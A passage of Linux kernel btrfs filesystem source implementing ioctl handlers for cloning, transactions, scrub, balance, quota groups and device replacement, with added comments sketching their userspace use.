inode->i_mtime = inode->i_ctime = CURRENT_TIME;
/*
* we round up to the block size at eof when
* determining which extents to clone above,
* but shouldn't round up the file size
*/
endoff = new_key.offset + datal;
if (endoff > destoff+olen)
endoff = destoff+olen;
if (endoff > inode->i_size)
btrfs_i_size_write(inode, endoff);
ret = btrfs_update_inode(trans, root, inode);
if (ret) {
btrfs_abort_transaction(trans, root, ret);
btrfs_end_transaction(trans, root);
goto out;
}
ret = btrfs_end_transaction(trans, root);
}
next:
btrfs_release_path(path);
key.offset++;
}
ret = 0;
out:
btrfs_release_path(path);
unlock_extent(&BTRFS_I(src)->io_tree, off, off + len - 1);
out_unlock:
mutex_unlock(&src->i_mutex);
mutex_unlock(&inode->i_mutex);
vfree(buf);
btrfs_free_path(path);
out_fput:
fdput(src_file);
out_drop_write:
mnt_drop_write_file(file);
return ret;
}
static long btrfs_ioctl_clone_range(struct file *file, void __user *argp)
{
struct btrfs_ioctl_clone_range_args args;
if (copy_from_user(&args, argp, sizeof(args)))
return -EFAULT;
return btrfs_ioctl_clone(file, args.src_fd, args.src_offset,
args.src_length, args.dest_offset);
}
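/*
 * Reader's note: the two clone entry points above are driven from userspace
 * through ioctl(2) on the *destination* file descriptor. A rough sketch of the
 * caller side is given below; it is illustrative only, assumes a userspace
 * program that includes <sys/ioctl.h> and <linux/btrfs.h> (which provide the
 * BTRFS_IOC_CLONE* numbers and struct btrfs_ioctl_clone_range_args), and omits
 * error handling. As the alignment checks above require, offsets and length
 * for a partial clone must be block aligned.
 *
 *     int src = open("src", O_RDONLY);
 *     int dst = open("dst", O_WRONLY);        // must not be O_APPEND
 *
 *     // whole-file reflink: the source fd itself is the ioctl argument
 *     ioctl(dst, BTRFS_IOC_CLONE, src);
 *
 *     // partial reflink of the first 1 MiB
 *     struct btrfs_ioctl_clone_range_args args = {
 *         .src_fd = src,
 *         .src_offset = 0,
 *         .src_length = 1 << 20,
 *         .dest_offset = 0,
 *     };
 *     ioctl(dst, BTRFS_IOC_CLONE_RANGE, &args);
 */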
/*
* there are many ways the trans_start and trans_end ioctls can lead
* to deadlocks. They should only be used by applications that
* basically own the machine, and have a very in depth understanding
* of all the possible deadlocks and enospc problems.
*/
static long btrfs_ioctl_trans_start(struct file *file)
{
struct inode *inode = fdentry(file)->d_inode;
struct btrfs_root *root = BTRFS_I(inode)->root;
struct btrfs_trans_handle *trans;
int ret;
ret = -EPERM;
if (!capable(CAP_SYS_ADMIN))
goto out;
ret = -EINPROGRESS;
if (file->private_data)
goto out;
ret = -EROFS;
if (btrfs_root_readonly(root))
goto out;
ret = mnt_want_write_file(file);
if (ret)
goto out;
atomic_inc(&root->fs_info->open_ioctl_trans);
ret = -ENOMEM;
trans = btrfs_start_ioctl_transaction(root);
if (IS_ERR(trans))
goto out_drop;
file->private_data = trans;
return 0;
out_drop:
atomic_dec(&root->fs_info->open_ioctl_trans);
mnt_drop_write_file(file);
out:
return ret;
}
static long btrfs_ioctl_default_subvol(struct file *file, void __user *argp)
{
struct inode *inode = fdentry(file)->d_inode;
struct btrfs_root *root = BTRFS_I(inode)->root;
struct btrfs_root *new_root;
struct btrfs_dir_item *di;
struct btrfs_trans_handle *trans;
struct btrfs_path *path;
struct btrfs_key location;
struct btrfs_disk_key disk_key;
u64 objectid = 0;
u64 dir_id;
int ret;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
ret = mnt_want_write_file(file);
if (ret)
return ret;
if (copy_from_user(&objectid, argp, sizeof(objectid))) {
ret = -EFAULT;
goto out;
}
if (!objectid)
objectid = root->root_key.objectid;
location.objectid = objectid;
location.type = BTRFS_ROOT_ITEM_KEY;
location.offset = (u64)-1;
new_root = btrfs_read_fs_root_no_name(root->fs_info, &location);
if (IS_ERR(new_root)) {
ret = PTR_ERR(new_root);
goto out;
}
if (btrfs_root_refs(&new_root->root_item) == 0) {
ret = -ENOENT;
goto out;
}
path = btrfs_alloc_path();
if (!path) {
ret = -ENOMEM;
goto out;
}
path->leave_spinning = 1;
trans = btrfs_start_transaction(root, 1);
if (IS_ERR(trans)) {
btrfs_free_path(path);
ret = PTR_ERR(trans);
goto out;
}
dir_id = btrfs_super_root_dir(root->fs_info->super_copy);
di = btrfs_lookup_dir_item(trans, root->fs_info->tree_root, path,
dir_id, "default", 7, 1);
if (IS_ERR_OR_NULL(di)) {
btrfs_free_path(path);
btrfs_end_transaction(trans, root);
printk(KERN_ERR "Umm, you don't have the default dir item, "
"this isn't going to work\n");
ret = -ENOENT;
goto out;
}
btrfs_cpu_key_to_disk(&disk_key, &new_root->root_key);
btrfs_set_dir_item_key(path->nodes[0], di, &disk_key);
btrfs_mark_buffer_dirty(path->nodes[0]);
btrfs_free_path(path);
btrfs_set_fs_incompat(root->fs_info, DEFAULT_SUBVOL);
btrfs_end_transaction(trans, root);
out:
mnt_drop_write_file(file);
return ret;
}
void btrfs_get_block_group_info(struct list_head *groups_list,
struct btrfs_ioctl_space_info *space)
{
struct btrfs_block_group_cache *block_group;
space->total_bytes = 0;
space->used_bytes = 0;
space->flags = 0;
list_for_each_entry(block_group, groups_list, list) {
space->flags = block_group->flags;
space->total_bytes += block_group->key.offset;
space->used_bytes +=
btrfs_block_group_used(&block_group->item);
}
}
long btrfs_ioctl_space_info(struct btrfs_root *root, void __user *arg)
{
struct btrfs_ioctl_space_args space_args;
struct btrfs_ioctl_space_info space;
struct btrfs_ioctl_space_info *dest;
struct btrfs_ioctl_space_info *dest_orig;
struct btrfs_ioctl_space_info __user *user_dest;
struct btrfs_space_info *info;
u64 types[] = {BTRFS_BLOCK_GROUP_DATA,
BTRFS_BLOCK_GROUP_SYSTEM,
BTRFS_BLOCK_GROUP_METADATA,
BTRFS_BLOCK_GROUP_DATA | BTRFS_BLOCK_GROUP_METADATA};
int num_types = 4;
int alloc_size;
int ret = 0;
u64 slot_count = 0;
int i, c;
if (copy_from_user(&space_args,
(struct btrfs_ioctl_space_args __user *)arg,
sizeof(space_args)))
return -EFAULT;
for (i = 0; i < num_types; i++) {
struct btrfs_space_info *tmp;
info = NULL;
rcu_read_lock();
list_for_each_entry_rcu(tmp, &root->fs_info->space_info,
list) {
if (tmp->flags == types[i]) {
info = tmp;
break;
}
}
rcu_read_unlock();
if (!info)
continue;
down_read(&info->groups_sem);
for (c = 0; c < BTRFS_NR_RAID_TYPES; c++) {
if (!list_empty(&info->block_groups[c]))
slot_count++;
}
up_read(&info->groups_sem);
}
/* space_slots == 0 means they are asking for a count */
if (space_args.space_slots == 0) {
space_args.total_spaces = slot_count;
goto out;
}
slot_count = min_t(u64, space_args.space_slots, slot_count);
alloc_size = sizeof(*dest) * slot_count;
/* we generally have at most 6 or so space infos, one for each raid
* level. So, a whole page should be more than enough for everyone
*/
if (alloc_size > PAGE_CACHE_SIZE)
return -ENOMEM;
space_args.total_spaces = 0;
dest = kmalloc(alloc_size, GFP_NOFS);
if (!dest)
return -ENOMEM;
dest_orig = dest;
/* now we have a buffer to copy into */
for (i = 0; i < num_types; i++) {
struct btrfs_space_info *tmp;
if (!slot_count)
break;
info = NULL;
rcu_read_lock();
list_for_each_entry_rcu(tmp, &root->fs_info->space_info,
list) {
if (tmp->flags == types[i]) {
info = tmp;
break;
}
}
rcu_read_unlock();
if (!info)
continue;
down_read(&info->groups_sem);
for (c = 0; c < BTRFS_NR_RAID_TYPES; c++) {
if (!list_empty(&info->block_groups[c])) {
btrfs_get_block_group_info(
&info->block_groups[c], &space);
memcpy(dest, &space, sizeof(space));
dest++;
space_args.total_spaces++;
slot_count--;
}
if (!slot_count)
break;
}
up_read(&info->groups_sem);
}
user_dest = (struct btrfs_ioctl_space_info __user *)
(arg + sizeof(struct btrfs_ioctl_space_args));
if (copy_to_user(user_dest, dest_orig, alloc_size))
ret = -EFAULT;
kfree(dest_orig);
out:
if (ret == 0 && copy_to_user(arg, &space_args, sizeof(space_args)))
ret = -EFAULT;
return ret;
}
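/*
 * Usage note for the ioctl implemented above: as the in-line comments hint,
 * BTRFS_IOC_SPACE_INFO is a two-step protocol. A caller first asks for the
 * slot count (space_slots == 0) and then repeats the call with room for that
 * many btrfs_ioctl_space_info entries appended to the args struct. A rough
 * userspace sketch (assumes <sys/ioctl.h> and <linux/btrfs.h>; error handling
 * left out):
 *
 *     struct btrfs_ioctl_space_args probe = { .space_slots = 0 };
 *     ioctl(fd, BTRFS_IOC_SPACE_INFO, &probe);        // fills total_spaces
 *
 *     size_t sz = sizeof(struct btrfs_ioctl_space_args) +
 *                 probe.total_spaces * sizeof(struct btrfs_ioctl_space_info);
 *     struct btrfs_ioctl_space_args *args = calloc(1, sz);
 *     args->space_slots = probe.total_spaces;
 *     ioctl(fd, BTRFS_IOC_SPACE_INFO, args);
 *     // args->spaces[0 .. args->total_spaces - 1] now describe each group
 */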
/*
* there are many ways the trans_start and trans_end ioctls can lead
* to deadlocks. They should only be used by applications that
* basically own the machine, and have a very in depth understanding
* of all the possible deadlocks and enospc problems.
*/
long btrfs_ioctl_trans_end(struct file *file)
{
struct inode *inode = fdentry(file)->d_inode;
struct btrfs_root *root = BTRFS_I(inode)->root;
struct btrfs_trans_handle *trans;
trans = file->private_data;
if (!trans)
return -EINVAL;
file->private_data = NULL;
btrfs_end_transaction(trans, root);
atomic_dec(&root->fs_info->open_ioctl_trans);
mnt_drop_write_file(file);
return 0;
}
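/*
 * As the warning comments above stress, these two ioctls are a matched pair
 * reserved for trusted (CAP_SYS_ADMIN) programs: one opens a transaction with
 * BTRFS_IOC_TRANS_START, performs the writes that should share it, and should
 * release it with BTRFS_IOC_TRANS_END on the same descriptor. A minimal,
 * illustrative userspace sketch (not part of this file, no error handling):
 *
 *     int fd = open("/mnt/btrfs/file", O_RDWR);
 *     ioctl(fd, BTRFS_IOC_TRANS_START, NULL);
 *     // ... writes that should land in one transaction ...
 *     ioctl(fd, BTRFS_IOC_TRANS_END, NULL);
 */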
static noinline long btrfs_ioctl_start_sync(struct btrfs_root *root,
void __user *argp)
{
struct btrfs_trans_handle *trans;
u64 transid;
int ret;
trans = btrfs_attach_transaction(root);
if (IS_ERR(trans)) {
if (PTR_ERR(trans) != -ENOENT)
return PTR_ERR(trans);
/* No running transaction, don't bother */
transid = root->fs_info->last_trans_committed;
goto out;
}
transid = trans->transid;
ret = btrfs_commit_transaction_async(trans, root, 0);
if (ret) {
btrfs_end_transaction(trans, root);
return ret;
}
out:
if (argp)
if (copy_to_user(argp, &transid, sizeof(transid)))
return -EFAULT;
return 0;
}
static noinline long btrfs_ioctl_wait_sync(struct btrfs_root *root,
void __user *argp)
{
u64 transid;
if (argp) {
if (copy_from_user(&transid, argp, sizeof(transid)))
return -EFAULT;
} else {
transid = 0; /* current trans */
}
return btrfs_wait_for_commit(root, transid);
}
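/*
 * The two helpers above are meant to be used together: START_SYNC kicks off an
 * asynchronous commit and reports its transaction id, and WAIT_SYNC blocks
 * until that id (or, with 0, the currently committing transaction) is on disk.
 * A rough userspace sketch of the intended sequence (illustrative only, no
 * error handling):
 *
 *     __u64 transid = 0;
 *     ioctl(fd, BTRFS_IOC_START_SYNC, &transid);      // returns the transid
 *     // ... other work can overlap with the commit ...
 *     ioctl(fd, BTRFS_IOC_WAIT_SYNC, &transid);       // wait for that commit
 */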
static long btrfs_ioctl_scrub(struct file *file, void __user *arg)
{
struct btrfs_root *root = BTRFS_I(fdentry(file)->d_inode)->root;
struct btrfs_ioctl_scrub_args *sa;
int ret;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
sa = memdup_user(arg, sizeof(*sa));
if (IS_ERR(sa))
return PTR_ERR(sa);
if (!(sa->flags & BTRFS_SCRUB_READONLY)) {
ret = mnt_want_write_file(file);
if (ret)
goto out;
}
ret = btrfs_scrub_dev(root->fs_info, sa->devid, sa->start, sa->end,
&sa->progress, sa->flags & BTRFS_SCRUB_READONLY,
0);
if (copy_to_user(arg, sa, sizeof(*sa)))
ret = -EFAULT;
if (!(sa->flags & BTRFS_SCRUB_READONLY))
mnt_drop_write_file(file);
out:
kfree(sa);
return ret;
}
static long btrfs_ioctl_scrub_cancel(struct btrfs_root *root, void __user *arg)
{
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
return btrfs_scrub_cancel(root->fs_info);
}
static long btrfs_ioctl_scrub_progress(struct btrfs_root *root,
void __user *arg)
{
struct btrfs_ioctl_scrub_args *sa;
int ret;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
sa = memdup_user(arg, sizeof(*sa));
if (IS_ERR(sa))
return PTR_ERR(sa);
ret = btrfs_scrub_progress(root, sa->devid, &sa->progress);
if (copy_to_user(arg, sa, sizeof(*sa)))
ret = -EFAULT;
kfree(sa);
return ret;
}
static long btrfs_ioctl_get_dev_stats(struct btrfs_root *root,
void __user *arg)
{
struct btrfs_ioctl_get_dev_stats *sa;
int ret;
sa = memdup_user(arg, sizeof(*sa));
if (IS_ERR(sa))
return PTR_ERR(sa);
if ((sa->flags & BTRFS_DEV_STATS_RESET) && !capable(CAP_SYS_ADMIN)) {
kfree(sa);
return -EPERM;
}
ret = btrfs_get_dev_stats(root, sa);
if (copy_to_user(arg, sa, sizeof(*sa)))
ret = -EFAULT;
kfree(sa);
return ret;
}
static long btrfs_ioctl_dev_replace(struct btrfs_root *root, void __user *arg)
{
struct btrfs_ioctl_dev_replace_args *p;
int ret;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
p = memdup_user(arg, sizeof(*p));
if (IS_ERR(p))
return PTR_ERR(p);
switch (p->cmd) {
case BTRFS_IOCTL_DEV_REPLACE_CMD_START:
if (atomic_xchg(
&root->fs_info->mutually_exclusive_operation_running,
1)) {
pr_info("btrfs: dev add/delete/balance/replace/resize operation in progress\n");
ret = -EINPROGRESS;
} else {
ret = btrfs_dev_replace_start(root, p);
atomic_set(
&root->fs_info->mutually_exclusive_operation_running,
0);
}
break;
case BTRFS_IOCTL_DEV_REPLACE_CMD_STATUS:
btrfs_dev_replace_status(root->fs_info, p);
ret = 0;
break;
case BTRFS_IOCTL_DEV_REPLACE_CMD_CANCEL:
ret = btrfs_dev_replace_cancel(root->fs_info, p);
break;
default:
ret = -EINVAL;
break;
}
if (copy_to_user(arg, p, sizeof(*p)))
ret = -EFAULT;
kfree(p);
return ret;
}
static long btrfs_ioctl_ino_to_path(struct btrfs_root *root, void __user *arg)
{
int ret = 0;
int i;
u64 rel_ptr;
int size;
struct btrfs_ioctl_ino_path_args *ipa = NULL;
struct inode_fs_paths *ipath = NULL;
struct btrfs_path *path;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
path = btrfs_alloc_path();
if (!path) {
ret = -ENOMEM;
goto out;
}
ipa = memdup_user(arg, sizeof(*ipa));
if (IS_ERR(ipa)) {
ret = PTR_ERR(ipa);
ipa = NULL;
goto out;
}
size = min_t(u32, ipa->size, 4096);
ipath = init_ipath(size, root, path);
if (IS_ERR(ipath)) {
ret = PTR_ERR(ipath);
ipath = NULL;
goto out;
}
ret = paths_from_inode(ipa->inum, ipath);
if (ret < 0)
goto out;
for (i = 0; i < ipath->fspath->elem_cnt; ++i) {
rel_ptr = ipath->fspath->val[i] -
(u64)(unsigned long)ipath->fspath->val;
ipath->fspath->val[i] = rel_ptr;
}
ret = copy_to_user((void *)(unsigned long)ipa->fspath,
(void *)(unsigned long)ipath->fspath, size);
if (ret) {
ret = -EFAULT;
goto out;
}
out:
btrfs_free_path(path);
free_ipath(ipath);
kfree(ipa);
return ret;
}
static int build_ino_list(u64 inum, u64 offset, u64 root, void *ctx)
{
struct btrfs_data_container *inodes = ctx;
const size_t c = 3 * sizeof(u64);
if (inodes->bytes_left >= c) {
inodes->bytes_left -= c;
inodes->val[inodes->elem_cnt] = inum;
inodes->val[inodes->elem_cnt + 1] = offset;
inodes->val[inodes->elem_cnt + 2] = root;
inodes->elem_cnt += 3;
} else {
inodes->bytes_missing += c - inodes->bytes_left;
inodes->bytes_left = 0;
inodes->elem_missed += 3;
}
return 0;
}
static long btrfs_ioctl_logical_to_ino(struct btrfs_root *root,
void __user *arg)
{
int ret = 0;
int size;
struct btrfs_ioctl_logical_ino_args *loi;
struct btrfs_data_container *inodes = NULL;
struct btrfs_path *path = NULL;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
loi = memdup_user(arg, sizeof(*loi));
if (IS_ERR(loi)) {
ret = PTR_ERR(loi);
loi = NULL;
goto out;
}
path = btrfs_alloc_path();
if (!path) {
ret = -ENOMEM;
goto out;
}
size = min_t(u32, loi->size, 64 * 1024);
inodes = init_data_container(size);
if (IS_ERR(inodes)) {
ret = PTR_ERR(inodes);
inodes = NULL;
goto out;
}
ret = iterate_inodes_from_logical(loi->logical, root->fs_info, path,
build_ino_list, inodes);
if (ret == -EINVAL)
ret = -ENOENT;
if (ret < 0)
goto out;
ret = copy_to_user((void *)(unsigned long)loi->inodes,
(void *)(unsigned long)inodes, size);
if (ret)
ret = -EFAULT;
out:
btrfs_free_path(path);
vfree(inodes);
kfree(loi);
return ret;
}
void update_ioctl_balance_args(struct btrfs_fs_info *fs_info, int lock,
struct btrfs_ioctl_balance_args *bargs)
{
struct btrfs_balance_control *bctl = fs_info->balance_ctl;
bargs->flags = bctl->flags;
if (atomic_read(&fs_info->balance_running))
bargs->state |= BTRFS_BALANCE_STATE_RUNNING;
if (atomic_read(&fs_info->balance_pause_req))
bargs->state |= BTRFS_BALANCE_STATE_PAUSE_REQ;
if (atomic_read(&fs_info->balance_cancel_req))
bargs->state |= BTRFS_BALANCE_STATE_CANCEL_REQ;
memcpy(&bargs->data, &bctl->data, sizeof(bargs->data));
memcpy(&bargs->meta, &bctl->meta, sizeof(bargs->meta));
memcpy(&bargs->sys, &bctl->sys, sizeof(bargs->sys));
if (lock) {
spin_lock(&fs_info->balance_lock);
memcpy(&bargs->stat, &bctl->stat, sizeof(bargs->stat));
spin_unlock(&fs_info->balance_lock);
} else {
memcpy(&bargs->stat, &bctl->stat, sizeof(bargs->stat));
}
}
static long btrfs_ioctl_balance(struct file *file, void __user *arg)
{
struct btrfs_root *root = BTRFS_I(fdentry(file)->d_inode)->root;
struct btrfs_fs_info *fs_info = root->fs_info;
struct btrfs_ioctl_balance_args *bargs;
struct btrfs_balance_control *bctl;
int ret;
int need_to_clear_lock = 0;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
ret = mnt_want_write_file(file);
if (ret)
return ret;
mutex_lock(&fs_info->volume_mutex);
mutex_lock(&fs_info->balance_mutex);
if (arg) {
bargs = memdup_user(arg, sizeof(*bargs));
if (IS_ERR(bargs)) {
ret = PTR_ERR(bargs);
goto out;
}
if (bargs->flags & BTRFS_BALANCE_RESUME) {
if (!fs_info->balance_ctl) {
ret = -ENOTCONN;
goto out_bargs;
}
bctl = fs_info->balance_ctl;
spin_lock(&fs_info->balance_lock);
bctl->flags |= BTRFS_BALANCE_RESUME;
spin_unlock(&fs_info->balance_lock);
goto do_balance;
}
} else {
bargs = NULL;
}
if (atomic_xchg(&root->fs_info->mutually_exclusive_operation_running,
1)) {
pr_info("btrfs: dev add/delete/balance/replace/resize operation in progress\n");
ret = -EINPROGRESS;
goto out_bargs;
}
need_to_clear_lock = 1;
bctl = kzalloc(sizeof(*bctl), GFP_NOFS);
if (!bctl) {
ret = -ENOMEM;
goto out_bargs;
}
bctl->fs_info = fs_info;
if (arg) {
memcpy(&bctl->data, &bargs->data, sizeof(bctl->data));
memcpy(&bctl->meta, &bargs->meta, sizeof(bctl->meta));
memcpy(&bctl->sys, &bargs->sys, sizeof(bctl->sys));
bctl->flags = bargs->flags;
} else {
/* balance everything - no filters */
bctl->flags |= BTRFS_BALANCE_TYPE_MASK;
}
do_balance:
ret = btrfs_balance(bctl, bargs);
/*
* bctl is freed in __cancel_balance or in free_fs_info if
* restriper was paused all the way until unmount
*/
if (arg) {
if (copy_to_user(arg, bargs, sizeof(*bargs)))
ret = -EFAULT;
}
out_bargs:
kfree(bargs);
out:
if (need_to_clear_lock)
atomic_set(&root->fs_info->mutually_exclusive_operation_running,
0);
mutex_unlock(&fs_info->balance_mutex);
mutex_unlock(&fs_info->volume_mutex);
mnt_drop_write_file(file);
return ret;
}
static long btrfs_ioctl_balance_ctl(struct btrfs_root *root, int cmd)
{
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
switch (cmd) {
case BTRFS_BALANCE_CTL_PAUSE:
return btrfs_pause_balance(root->fs_info);
case BTRFS_BALANCE_CTL_CANCEL:
return btrfs_cancel_balance(root->fs_info);
}
return -EINVAL;
}
static long btrfs_ioctl_balance_progress(struct btrfs_root *root,
void __user *arg)
{
struct btrfs_fs_info *fs_info = root->fs_info;
struct btrfs_ioctl_balance_args *bargs;
int ret = 0;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
mutex_lock(&fs_info->balance_mutex);
if (!fs_info->balance_ctl) {
ret = -ENOTCONN;
goto out;
}
bargs = kzalloc(sizeof(*bargs), GFP_NOFS);
if (!bargs) {
ret = -ENOMEM;
goto out;
}
update_ioctl_balance_args(fs_info, 1, bargs);
if (copy_to_user(arg, bargs, sizeof(*bargs)))
ret = -EFAULT;
kfree(bargs);
out:
mutex_unlock(&fs_info->balance_mutex);
return ret;
}
static long btrfs_ioctl_quota_ctl(struct file *file, void __user *arg)
{
struct btrfs_root *root = BTRFS_I(fdentry(file)->d_inode)->root;
struct btrfs_ioctl_quota_ctl_args *sa;
struct btrfs_trans_handle *trans = NULL;
int ret;
int err;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
ret = mnt_want_write_file(file);
if (ret)
return ret;
sa = memdup_user(arg, sizeof(*sa));
if (IS_ERR(sa)) {
ret = PTR_ERR(sa);
goto drop_write;
}
if (sa->cmd != BTRFS_QUOTA_CTL_RESCAN) {
trans = btrfs_start_transaction(root, 2);
if (IS_ERR(trans)) {
ret = PTR_ERR(trans);
goto out;
}
}
switch (sa->cmd) {
case BTRFS_QUOTA_CTL_ENABLE:
ret = btrfs_quota_enable(trans, root->fs_info);
break;
case BTRFS_QUOTA_CTL_DISABLE:
ret = btrfs_quota_disable(trans, root->fs_info);
break;
case BTRFS_QUOTA_CTL_RESCAN:
ret = btrfs_quota_rescan(root->fs_info);
break;
default:
ret = -EINVAL;
break;
}
if (copy_to_user(arg, sa, sizeof(*sa)))
ret = -EFAULT;
if (trans) {
err = btrfs_commit_transaction(trans, root);
if (err && !ret)
ret = err;
}
out:
kfree(sa);
drop_write:
mnt_drop_write_file(file);
return ret;
}
static long btrfs_ioctl_qgroup_assign(struct file *file, void __user *arg)
{
struct btrfs_root *root = BTRFS_I(fdentry(file)->d_inode)->root;
struct btrfs_ioctl_qgroup_assign_args *sa;
struct btrfs_trans_handle *trans;
int ret;
int err;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
ret = mnt_want_write_file(file);
if (ret)
return ret;
sa = memdup_user(arg, sizeof(*sa));
if (IS_ERR(sa)) {
ret = PTR_ERR(sa);
goto drop_write;
}
trans = btrfs_join_transaction(root);
if (IS_ERR(trans)) {
ret = PTR_ERR(trans);
goto out;
}
/* FIXME: check if the IDs really exist */
if (sa->assign) {
ret = btrfs_add_qgroup_relation(trans, root->fs_info,
sa->src, sa->dst);
} else {
ret = btrfs_del_qgroup_relation(trans, root->fs_info,
sa->src, sa->dst);
}
err = btrfs_end_transaction(trans, root);
if (err && !ret)
ret = err;
out:
kfree(sa);
drop_write:
mnt_drop_write_file(file);
return ret;
}
static long btrfs_ioctl_qgroup_create(struct file *file, void __user *arg)
{
struct btrfs_root *root = BTRFS_I(fdentry(file)->d_inode)->root;
struct btrfs_ioctl_qgroup_create_args *sa;
struct btrfs_trans_handle *trans;
int ret;
int err;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
ret = mnt_want_write_file(file);
if (ret)
return ret;
sa = memdup_user(arg, sizeof(*sa));
if (IS_ERR(sa)) {
ret = PTR_ERR(sa);
goto drop_write;
}
trans = btrfs_join_transaction(root);
if (IS_ERR(trans)) {
ret = PTR_ERR(trans);
goto out;
}
/* FIXME: check if the IDs really exist */
if (sa->create) {
ret = btrfs_create_qgroup(trans, root->fs_info, sa->qgroupid,
NULL);
} else {
ret = btrfs_remove_qgroup(trans, root->fs_info, sa->qgroupid);
}
err = btrfs_end_transaction(trans, root);
if (err && !ret)
ret = err;
out:
kfree(sa);
drop_write:
mnt_drop_write_file(file);
return ret;
}
static long btrfs_ioctl_qgroup_limit(struct file *file, void __user *arg)
{
struct btrfs_root *root = BTRFS_I(fdentry(file)->d_inode)->root;
struct btrfs_ioctl_qgroup_limit_args *sa;
struct btrfs_trans_handle *trans;
int ret;
int err;
u64 qgroupid;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
ret = mnt_want_write_file(file);
if (ret)
return ret;
sa = memdup_user(arg, sizeof(*sa));
if (IS_ERR(sa)) {
ret = PTR_ERR(sa);
goto drop_write;
}
trans = btrfs_join_transaction(root);
if (IS_ERR(trans)) {
ret = PTR_ERR(trans);
goto out;
}
qgroupid = sa->qgroupid;
if (!qgroupid) {
/* take the current subvol as qgroup */
qgroupid = root->root_key.objectid;
}
/* FIXME: check if the IDs really exist */
ret = btrfs_limit_qgroup(trans, root->fs_info, qgroupid, &sa->lim);
err = btrfs_end_transaction(trans, root);
if (err && !ret)
ret = err;
out:
kfree(sa);
drop_write:
mnt_drop_write_file(file);
return ret;
}
static long btrfs_ioctl_set_received_subvol(struct file *file,
void __user *arg)
{
struct btrfs_ioctl_received_subvol_args *sa = NULL;
struct inode *inode = fdentry(file)->d_inode;
struct btrfs_root *root = BTRFS_I(inode)->root;
struct btrfs_root_item *root_item = &root->root_item;
struct btrfs_trans_handle *trans;
struct timespec ct = CURRENT_TIME;
int ret = 0;
ret = mnt_want_write_file(file);
if (ret < 0)
return ret;
down_write(&root->fs_info->subvol_sem);
if (btrfs_ino(inode) != BTRFS_FIRST_FREE_OBJECTID) {
ret = -EINVAL;
goto out;
}
if (btrfs_root_readonly(root)) {
ret = -EROFS;
goto out;
}
if (!inode_owner_or_capable(inode)) {
ret = -EACCES;
goto out;
}
sa = memdup_user(arg, sizeof(*sa));
if (IS_ERR(sa)) {
ret = PTR_ERR(sa);
sa = NULL;
goto out;
}
trans = btrfs_start_transaction(root, 1);
if (IS_ERR(trans)) {
ret = PTR_ERR(trans);
trans = NULL;
goto out;
}
sa->rtransid = trans->transid;
sa->rtime.sec = ct.tv_sec;
sa->rtime.nsec = ct.tv_nsec;
memcpy(root_item->received_uuid, sa->uuid, BTRFS_UUID_SIZE);
btrfs_set_root_stransid(root_item, sa->stransid);
btrfs_set_root_rtransid(root_item, sa->rtransid);
root_item->stime.sec = cpu_to_le64(sa->stime.sec);
root_item->stime.nsec = cpu_to_le32(sa->stime.nsec);
root_item->rtime.sec = cpu_to_le64(sa->rtime.sec);
root_item->rtime.nsec = cpu_to_le32(sa->rtime.nsec);
ret = btrfs_update_root(trans, root->fs_info->tree_root,
&root->root_key, &root->root_item);
if (ret < 0) {
btrfs_end_transaction(trans, root);
trans = NULL;
goto out;
} else {
ret = btrfs_commit_transaction(trans, root);
if (ret < 0)
goto out;
}
ret = copy_to_user(arg, sa, sizeof(*sa));
if (ret)
ret = -EFAULT;
out:
kfree(sa);
up_write(&root->fs_info->subvol_sem);
mnt_drop_write_file(file);
return ret;
}
long btrfs_ioctl(struct file *file, unsigned int
cmd, unsigned long arg)
{
struct btrfs_root *root = BTRFS_I(fdentry(file)->d_inode)->root;
void __user *argp = (void __user *)arg;
switch (cmd) {
case FS_IOC_GETFLAGS:
return btrfs_ioctl_getflags(file, argp);
case FS_IOC_SETFLAGS:
return btrfs_ioctl_setflags(file, argp);
case FS_IOC_GETVERSION:
return btrfs_ioctl_getversion(file, argp);
case FITRIM:
return btrfs_ioctl_fitrim(file, argp);
case BTRFS_IOC_SNAP_CREATE:
return btrfs_ioctl_snap_create(file, argp, 0);
case BTRFS_IOC_SNAP_CREATE_V2:
return btrfs_ioctl_snap_create_v2(file, argp, 0);
case BTRFS_IOC_SUBVOL_CREATE:
return btrfs_ioctl_snap_create(file, argp, 1);
case BTRFS_IOC_SUBVOL_CREATE_V2:
return btrfs_ioctl_snap_create_v2(file, argp, 1);
case BTRFS_IOC_SNAP_DESTROY:
return btrfs_ioctl_snap_destroy(file, argp);
case BTRFS_IOC_SUBVOL_GETFLAGS:
return btrfs_ioctl_subvol_getflags(file, argp);
case BTRFS_IOC_SUBVOL_SETFLAGS:
return btrfs_ioctl_subvol_setflags(file, argp);
case BTRFS_IOC_DEFAULT_SUBVOL:
return btrfs_ioctl_default_subvol(file, argp);
case BTRFS_IOC_DEFRAG:
return btrfs_ioctl_defrag(file, NULL);
case BTRFS_IOC_DEFRAG_RANGE:
return btrfs_ioctl_defrag(file, argp);
case BTRFS_IOC_RESIZE:
return btrfs_ioctl_resize(file, argp);
case BTRFS_IOC_ADD_DEV:
return btrfs_ioctl_add_dev(root, argp);
case BTRFS_IOC_RM_DEV:
return btrfs_ioctl_rm_dev(file, argp);
case BTRFS_IOC_FS_INFO:
return btrfs_ioctl_fs_info(root, argp);
case BTRFS_IOC_DEV_INFO:
return btrfs_ioctl_dev_info(root, argp);
case BTRFS_IOC_BALANCE:
return btrfs_ioctl_balance(file, NULL);
case BTRFS_IOC_CLONE:
return btrfs_ioctl_clone(file, arg, 0, 0, 0);
case BTRFS_IOC_CLONE_RANGE:
return btrfs_ioctl_clone_range(file, argp);
case BTRFS_IOC_TRANS_START:
return btrfs_ioctl_trans_start(file);
case BTRFS_IOC_TRANS_END:
return btrfs_ioctl_trans_end(file);
case BTRFS_IOC_TREE_SEARCH:
return btrfs_ioctl_tree_search(file, argp);
case BTRFS_IOC_INO_LOOKUP:
return btrfs_ioctl_ino_lookup(file, argp);
case BTRFS_IOC_INO_PATHS:
